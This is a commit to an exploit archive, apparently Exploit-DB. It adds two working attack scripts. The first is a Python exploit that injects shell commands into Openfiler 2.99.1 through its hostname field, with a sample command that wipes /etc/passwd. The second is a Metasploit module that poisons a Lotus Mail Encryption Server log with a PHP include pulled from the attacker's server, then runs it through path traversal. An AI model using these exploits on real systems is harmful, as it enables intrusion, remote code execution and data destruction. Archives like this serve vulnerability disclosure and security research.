Updated 12_24_2014

2014-12-24 04:50:12 +00:00 · 2014-12-24 04:50:12 +00:00 · c0a405fe68
commit c0a405fe68
parent 9f4c7b310b
3 changed files with 138 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -32045,3 +32045,4 @@ id,file,description,date,author,platform,type,port
 35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
+35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000
--- a/platforms/hardware/webapps/33247.txt
+++ b/platforms/hardware/webapps/33247.txt
@ -37,4 +37,49 @@ Steps to reproduce / PoC:



-  <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
+  <-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
+
+#!/usr/bin/env python
+# Exploit Title: Openfiler Remote Code Execution 
+# Date 21/12/2014
+# Affected Software version: 2.99.1
+# Alerted vendor: 7.5.14
+
+# Quick and dirty exploit
+# usage: python openfiler_RCE.py <Command>
+# Author: Dolev Farhi @dolevff
+
+import sys
+import urllib
+import urllib2
+import cookielib
+
+server = 'ip.add.re.ss'
+username = 'openfiler'
+password = 'password'
+timeout = 6
+command = '`' + ' '.join(sys.argv[1:]) + '`'
+
+if len(sys.argv[1:]) == 0:
+    print 'Missing argument (command)'
+    print 'example: python openfilerRCE.py echo > /etc/passwd'
+    sys.exit(0)
+
+try:
+    cj = cookielib.CookieJar()
+    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
+    login_data = urllib.urlencode({'username' : username, 'password' : password})
+    opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout)
+    payload = urllib.urlencode({'hostname' : command,'netconf' : 'Update'})
+    url = 'https://%s:446/admin/system.html' % (server)
+    resp = opener.open(url)
+    if 'logout.html' in resp.read():
+        opener.open('https://' + server + ':446/admin/system.html', payload)
+        print ('Executed %s :-)' %(command))
+        sys.exit(0)
+except urllib2.URLError, e:
+    print 'Error: %s' %(e.reason)
+    sys.exit(1)
+except Exception, e:
+    print 'Error: possibily invalid credentials, try again.'
+    sys.exit(1)
--- a/platforms/php/remote/35588.rb
+++ b/platforms/php/remote/35588.rb
@ -0,0 +1,91 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Exploit::Remote::HttpServer::PHPInclude
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Lotus Mail Encryption Server (Protector for Mail) Local File Inclusion',
+			'Description'    => %q{
+				This module exploits a local file inclusion vulnerability in
+				the Lotus Mail Encryption Server (Protector for Mail Encryption)
+				administration setup interface. The index.php file uses an unsafe include()
+				where an unauthenticated remote user may read (traversal) arbitrary file contents.
+				By abusing a second bug within Lotus, we can inject our payload
+				into a known location and call it via the LFI to gain remote code execution.
+				Version 2.1.0.1 Build(88.3.0.1.4323) is known to be vulnerable.
+				You may need to set DATE in the format YYYY-MM-DD to get this working,
+				where the remote host and metasploit instance have UTC timezone differences.
+			},
+			'Author'         => [ 'patrick' ],
+			'License'        => MSF_LICENSE,
+			'References'     =>
+				[
+					[ 'URL', 'http://www.osisecurity.com.au/advisories/' ], #0day
+					#[ 'CVE', 'X' ],
+					[ 'OSVDB', '87556'],
+					#[ 'BID', 'X' ],
+				],
+			'Privileged'     => false,
+			'Platform'       => 'php',
+			'Arch'           => ARCH_PHP,
+			'Targets'        => [[ 'Lotus Mail Encryption Server 2.1.0.1', { }]],
+			'DisclosureDate' => 'Nov 9 2012',
+			'DefaultTarget' => 0))
+
+		register_options(
+			[
+				Opt::RPORT(9000),
+				OptBool.new('SSL', [true, 'Use SSL', true]),
+				OptString.new("DATE", [false, 'The date of the target system log file in YYYY-MM-DD format']),
+			], self.class)
+	end
+
+	def check
+		res = send_request_cgi( { 'uri' => '/' })
+		if (res.code == 302 && res.body.match(/GetLoginScreen.uevent/))
+			return Exploit::CheckCode::Detected
+		end
+		return Exploit::CheckCode::Safe
+	end
+
+	def php_exploit
+
+		logfile = datastore['DATE'] ? datastore['DATE'] : Time.now.strftime("%Y-%m-%d")
+		if (logfile !~ /\d\d\d\d-\d\d-\d\d/) # if set by user datastore...
+			print_error("DATE is in incorrect format (use 'YYYY-MM-DD'). Unable to continue.")
+			return
+		end
+
+		# set up the initial log file RCE - this is unescaped ascii so we can execute it
+		# later >:) uid is tomcat so we cannot read apache's logs, and we are stuck inside
+		# tomcat's php-cgi wrapper which prevents /proc/* injection and a lot of the
+		# filesystem. example good injected log: '/var/log/ovid/omf-2012-08-01.log' patrick
+
+		inject_url = "/omc/GetSetupScreen.event?setupPage=<?php+include+'#{php_include_url}';+?>" # no whitespace
+		res = send_request_cgi( { 'uri' => inject_url })
+
+		if (res and res.code == 404 and res.body.match(/Lotus Protector for Mail Encryption - Page Not Found/)) # it returns a 404 but this is good.
+			vprint_good("Payload injected...")
+
+			response = send_request_cgi( {
+				'uri' => '/omc/pme/index.php',
+				'cookie' => "slaLANG=../../../../../../var/log/ovid/omf-#{logfile}.log%00;", # discard .php
+			})
+		end
+	end
+end